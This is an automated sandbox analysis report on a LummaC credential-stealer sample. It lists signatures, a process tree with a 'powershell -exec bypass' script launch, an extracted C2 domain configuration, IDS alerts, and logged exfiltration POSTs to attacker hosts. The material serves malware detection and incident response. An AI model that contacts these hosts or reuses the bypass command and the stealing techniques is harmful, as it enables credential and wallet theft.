Edit tour

Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Overview

General Information

Sample name:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
renamed because original name is a hash value
Original sample name:.exe
Analysis ID:1601483
MD5:c6107e0d217c3ce4f5d8c6198622556b
SHA1:77a152d6872184eb11824aea4371b7cb9577ea5d
SHA256:fec28394e0eef7ed5360f4a4ad4dc04e7c38afa25cb3086f988042a383dfe97d
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe" MD5: C6107E0D217C3CE4F5D8C6198622556B)
    • powershell.exe (PID: 4640 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{
  "C2 url": [
    "abaft-taboo.bond",
    "noxiuos-utopi.bond",
    "moonehobno.bond",
    "rainy-lamep.bond",
    "elfinyamen.bond",
    "cowertbabei.bond",
    "learnyprocce.bond",
    "conquemappe.bond",
    "traveladdicts.top"
  ],
  "Build id": "MeHdy4--pl2yan1"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x5311c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x566b2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:12:23.295506+010020283713Unknown Traffic192.168.2.949805172.67.202.141443TCP
              2025-01-28T16:12:35.723772+010020283713Unknown Traffic192.168.2.949882172.67.202.141443TCP
              2025-01-28T16:12:37.124523+010020283713Unknown Traffic192.168.2.949891172.67.202.141443TCP
              2025-01-28T16:12:49.974505+010020283713Unknown Traffic192.168.2.949224172.67.202.141443TCP
              2025-01-28T16:13:02.961072+010020283713Unknown Traffic192.168.2.949233172.67.202.141443TCP
              2025-01-28T16:13:05.572469+010020283713Unknown Traffic192.168.2.949234172.67.202.141443TCP
              2025-01-28T16:13:23.199997+010020283713Unknown Traffic192.168.2.949235172.67.202.141443TCP
              2025-01-28T16:13:36.459364+010020283713Unknown Traffic192.168.2.949236172.67.202.141443TCP
              2025-01-28T16:13:37.708029+010020283713Unknown Traffic192.168.2.949237104.26.3.16443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:12:35.235027+010020546531A Network Trojan was detected192.168.2.949805172.67.202.141443TCP
              2025-01-28T16:12:36.218632+010020546531A Network Trojan was detected192.168.2.949882172.67.202.141443TCP
              2025-01-28T16:13:37.219436+010020546531A Network Trojan was detected192.168.2.949236172.67.202.141443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:12:35.235027+010020498361A Network Trojan was detected192.168.2.949805172.67.202.141443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:12:36.218632+010020498121A Network Trojan was detected192.168.2.949882172.67.202.141443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:13:04.118061+010020480941Malware Command and Control Activity Detected192.168.2.949233172.67.202.141443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: moonehobno.bondAvira URL Cloud: Label: malware
              Source: noxiuos-utopi.bondAvira URL Cloud: Label: malware
              Source: learnyprocce.bondAvira URL Cloud: Label: malware
              Source: rainy-lamep.bondAvira URL Cloud: Label: malware
              Source: elfinyamen.bondAvira URL Cloud: Label: malware
              Source: cowertbabei.bondAvira URL Cloud: Label: malware
              Source: abaft-taboo.bondAvira URL Cloud: Label: malware
              Source: conquemappe.bondAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["abaft-taboo.bond", "noxiuos-utopi.bond", "moonehobno.bond", "rainy-lamep.bond", "elfinyamen.bond", "cowertbabei.bond", "learnyprocce.bond", "conquemappe.bond", "traveladdicts.top"], "Build id": "MeHdy4--pl2yan1"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: abaft-taboo.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: noxiuos-utopi.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: moonehobno.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: rainy-lamep.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: elfinyamen.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: cowertbabei.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: learnyprocce.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: conquemappe.bond
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmpString decryptor: traveladdicts.top
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49891 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49224 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49233 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49234 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49235 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49236 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.9:49237 version: TLS 1.2
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: number of queries: 1001
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49805 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49805 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49882 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49233 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49882 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49236 -> 172.67.202.141:443
              Source: Malware configuration extractorURLs: abaft-taboo.bond
              Source: Malware configuration extractorURLs: noxiuos-utopi.bond
              Source: Malware configuration extractorURLs: moonehobno.bond
              Source: Malware configuration extractorURLs: rainy-lamep.bond
              Source: Malware configuration extractorURLs: elfinyamen.bond
              Source: Malware configuration extractorURLs: cowertbabei.bond
              Source: Malware configuration extractorURLs: learnyprocce.bond
              Source: Malware configuration extractorURLs: conquemappe.bond
              Source: Malware configuration extractorURLs: traveladdicts.top
              Source: unknownDNS query: name: rentry.co
              Source: global trafficTCP traffic: 192.168.2.9:49161 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
              Source: Joe Sandbox ViewIP Address: 172.67.202.141 172.67.202.141
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49805 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49882 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49891 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49233 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49235 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49234 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49236 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49224 -> 172.67.202.141:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49237 -> 104.26.3.16:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4R91O26XP53ONV79User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6TPX6EWWU8QLGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15035Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ENY5G9P6AN86O47WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20569Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UDD2YJGU6IP3ESK79Y4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2656Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FCR2CY7USXN11D4GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574644Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: global trafficDNS traffic detected: DNS query: traveladdicts.top
              Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: rentry.co
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Jan 2025 15:13:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkXRJB%2Fs5vP1oGBpiFUPhRCJACrVgngHqPy%2Fy2l4j%2BiHMN%2BGcBdR8pXbOs%2BsxnutU6KoAPk7dNiEY8SR6vrwDz%2BGyr6LG8X1EsjXzz%2BQ6c%2B%2BbnH0q8IZF8IYDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9091ed731f6d0cbc-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1669&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1731909&cwnd=184&unsent_bytes=0&cid=7e756fa19c397caa&ts=268&x=0"
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microXO
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
